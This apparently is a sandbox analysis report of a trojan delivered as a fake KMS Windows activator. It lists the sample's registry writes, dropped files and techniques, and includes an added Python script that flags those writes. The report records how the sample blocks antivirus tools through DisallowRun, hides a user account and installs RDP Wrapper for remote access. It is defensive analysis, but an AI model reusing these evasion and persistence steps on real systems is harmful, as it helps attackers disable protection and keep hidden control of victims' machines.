Malware Analysis Report

2025-05-05 22:37

Sample ID 250419-znt92svtex
Target https://kms-auto.site/windows-10-activator/
Tags
rms defense_evasion discovery execution lateral_movement persistence privilege_escalation rat themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The submitted URL https://kms-auto.site/windows-10-activator/ was classified as: Known bad.

Malicious Activity Summary

rms defense_evasion discovery execution lateral_movement persistence privilege_escalation rat themida trojan

RMS

Rms family

Detected Nirsoft tools

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Grants admin privileges

Remote Service Session Hijacking: RDP Hijacking

Modifies Windows Firewall

Stops running service(s)

Blocks application from running via registry modification

Drops file in Drivers directory

Server Software Component: Terminal Services DLL

Themida packer

Checks BIOS information in registry

Checks computer location settings

Modifies file permissions

Loads dropped DLL

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Adds Run key to start application

Modifies WinLogon

Looks up external IP address via web service

Checks whether UAC is enabled

Drops file in System32 directory

Hide Artifacts: Hidden Users

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Permission Groups Discovery: Local Groups

Event Triggered Execution: Netsh Helper DLL

Runs net.exe

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Uses Volume Shadow Copy WMI provider

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Checks processor information in registry

NTFS ADS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious behavior: LoadsDriver

Enumerates system info in registry

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Reported

2025-04-19 20:52

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-19 20:52

Reported

2025-04-19 21:05

Platform

win10ltsc2021-20250410-en

Max time kernel

751s

Max time network

752s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://kms-auto.site/windows-10-activator/

Signatures

RMS

trojan rat rms

Rms family

rms

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
(empty row repeated 2 times: the signature matched twice, but no indicator or process was recorded)

Grants admin privileges

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Windows\SysWOW64\unsecapp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Windows\SysWOW64\unsecapp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\Setup\KMS.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Windows\SysWOW64\unsecapp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\Setup\update.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\Setup\IP.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\Setup\smss.exe N/A

Remote Service Session Hijacking: RDP Hijacking

lateral_movement
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net1.exe N/A

Blocks application from running via registry modification

defense_evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "Cureit.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\26 = "eset_smart_security_premium_live_installer.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe" C:\ProgramData\Setup\KMS.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe" C:\ProgramData\Setup\KMS.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\ProgramData\Setup\update.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A

Server Software Component: Terminal Services DLL

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" C:\ProgramData\RDPWinst.exe N/A

Stops running service(s)

defense_evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\Setup\IP.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\Setup\KMS.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\Setup\update.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\Setup\smss.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\Setup\smss.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\Setup\IP.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\Setup\KMS.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\Setup\update.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Setup\update.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Setup\svchost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Setup\smss.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation C:\ProgramData\Setup\install.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
(identical row repeated 64 times: icacls.exe was invoked 64 times, but the command lines were not recorded)

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
(empty row repeated 64 times: the packer signature matched 64 times, but no indicator or process was recorded)

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\ProgramData\Setup\IP.exe N/A

Checks whether UAC is enabled

defense_evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\Setup\KMS.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\Setup\update.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\Setup\IP.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\Setup\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\unsecapp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\unsecapp.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" C:\ProgramData\RDPWinst.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
(empty row repeated 57 times: the signature matched 57 times, but no indicator or process was recorded)

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\unsecapp.exe C:\ProgramData\Setup\IP.exe N/A
File opened for modification C:\Windows\SysWOW64\unsecapp.exe C:\ProgramData\Setup\IP.exe N/A
File created C:\Windows\System32\rfxvmt.dll C:\ProgramData\RDPWinst.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Windows\system32\reg.exe N/A
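
The registry rows in the tables above carry the persistence and defense-evasion core of this detonation: KMS.exe populates the per-user Explorer DisallowRun policy with AV and cleaner installer names and switches it on, RDPWinst.exe repoints the TermService ServiceDll at rdpwrap.dll and sets AllowMultipleTSSessions, IP.exe adds a Run entry for a ProgramData binary named taskhostw.exe, and reg.exe sets SpecialAccounts\UserList\John = 0, which hides that account from the logon screen. The Python below is an added example and not part of the sandbox report: it parses rows written in the report's flattened "Description Indicator Process Target" format, converts the NT object-manager registry paths to the HKLM/HKU spelling, and evaluates each write against a small rule set covering those five techniques. The rule names, the list of "user-writable" path markers and the SecurityHealth Run row (a constructed benign control) are the example's own assumptions; every other sample row is copied verbatim from the tables above.

```python
"""Classify sandbox registry 'Set value' rows against persistence / defense-evasion rules.

Added example for this report, not sandbox output. Sample rows are copied from the
report's tables, except the SecurityHealth Run row, which is a constructed benign
control included to show that the rules stay quiet on a normal autostart entry.
"""
import re
from dataclasses import dataclass

# Flattened report row:  Set value (type) \REGISTRY\...\Key\Name = "data" C:\proc.exe N/A
ROW_RE = re.compile(
    r'^Set value \((?P<kind>\w+)\) (?P<path>\\REGISTRY\\.+?) = "(?P<data>.*)" '
    r'(?P<process>[A-Za-z]:\\.+?) N/A$'
)

SAMPLE_ROWS = r"""
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe" C:\ProgramData\Setup\KMS.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\ProgramData\Setup\KMS.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\ProgramData\Setup\KMS.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" C:\ProgramData\RDPWinst.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\ProgramData\Setup\IP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" C:\ProgramData\RDPWinst.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth = "C:\\Windows\\system32\\SecurityHealthSystray.exe" C:\Windows\explorer.exe N/A
"""


@dataclass(frozen=True)
class RegEvent:
    kind: str      # reported value type: str / int
    key: str       # HKLM\... or HKU\<SID>\... without the value name
    name: str      # value name (a bare index for DisallowRun entries)
    data: str      # value data, with the report's doubled backslashes collapsed
    process: str   # image path of the writing process


def normalize_path(path: str) -> str:
    """Map NT object-manager hive names to the HKLM/HKU spelling the rules use."""
    for prefix, hive in (("\\REGISTRY\\MACHINE\\", "HKLM\\"), ("\\REGISTRY\\USER\\", "HKU\\")):
        if path.startswith(prefix):
            return hive + path[len(prefix):]
    return path


def parse_rows(text: str) -> list:
    """Parse 'Set value' rows; 'Key created/opened' rows carry no data and are skipped."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            key, _, name = normalize_path(m["path"]).rpartition("\\")
            events.append(RegEvent(m["kind"], key, name, m["data"].replace("\\\\", "\\"), m["process"]))
    return events


# Assumed markers for directories a standard user can write to (the example's own choice).
USER_WRITABLE = ("\\programdata\\", "\\users\\", "\\appdata\\", "\\temp\\")
DEFAULT_TERMSRV = "\\system32\\termsrv.dll"   # what TermService's ServiceDll ends with on a clean host

RULES = {
    # Explorer DisallowRun: the numbered entries are the blocklist, the DWORD switches it on.
    "disallow_run_blocklist": lambda e: e.key.lower().endswith("\\policies\\explorer\\disallowrun")
        or (e.key.lower().endswith("\\policies\\explorer") and e.name.lower() == "disallowrun" and e.data == "1"),
    # TermService told to load anything other than termsrv.dll (here RDP Wrapper's rdpwrap.dll).
    "termservice_servicedll_hijack": lambda e: e.key.lower().endswith("\\services\\termservice\\parameters")
        and e.name.lower() == "servicedll" and not e.data.lower().endswith(DEFAULT_TERMSRV),
    # SpecialAccounts\UserList\<user> = 0 hides the account from the logon screen.
    "hidden_logon_account": lambda e: e.key.lower().endswith("\\winlogon\\specialaccounts\\userlist") and e.data == "0",
    # Run entry whose target lives in a user-writable directory.
    "run_key_user_writable_path": lambda e: e.key.lower().endswith("\\currentversion\\run")
        and any(marker in e.data.lower() for marker in USER_WRITABLE),
    # AllowMultipleTSSessions = 1, written here by the RDP Wrapper installer (RDPWinst.exe).
    "allow_multiple_ts_sessions": lambda e: e.key.lower().endswith("\\winlogon")
        and e.name.lower() == "allowmultipletssessions" and e.data == "1",
}


def evaluate(events: list) -> list:
    """Return (rule_id, event) for every rule an event satisfies."""
    return [(rid, e) for e in events for rid, pred in RULES.items() if pred(e)]


def blocked_programs(events: list) -> list:
    """Executable names the sample put on the DisallowRun blocklist."""
    return sorted({e.data for e in events if e.key.lower().endswith("\\policies\\explorer\\disallowrun")})


def processes_by_rule(findings: list) -> dict:
    """Map rule id -> writing processes, to see which dropped binary owns which technique."""
    out = {}
    for rid, e in findings:
        out.setdefault(rid, set()).add(e.process)
    return out


if __name__ == "__main__":
    evs = parse_rows(SAMPLE_ROWS)
    for rid, ev in evaluate(evs):
        print(f"{rid:30} {ev.process:36} {ev.key}\\{ev.name} = {ev.data}")
    print("DisallowRun blocklist:", ", ".join(blocked_programs(evs)))
```

parse_rows() accepts any text in the report's row format, so the remaining "Set value" rows from the tables above can be pasted into SAMPLE_ROWS unchanged; rows of other kinds (Key created, Key opened, Key value queried) are ignored because they carry no data to evaluate. The rules are deliberately narrow (exact key suffixes and values rather than keyword matching) so that a clean host's own TermService and Run entries, like the control row, produce no findings.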

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Common Files\Doctor Web C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Common Files\McAfee C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Loaris Trojan Remover C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\IObit\Advanced SystemCare C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Moo0 C:\ProgramData\Setup\update.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Kaspersky Lab C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Cezurity C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Process Lasso C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Process Hacker 2 C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\EnigmaSoft C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\QuickCPU C:\ProgramData\Setup\update.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.dll C:\ProgramData\RDPWinst.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Transmission C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\RogueKiller C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\CPUID\HWMonitor C:\ProgramData\Setup\update.exe N/A
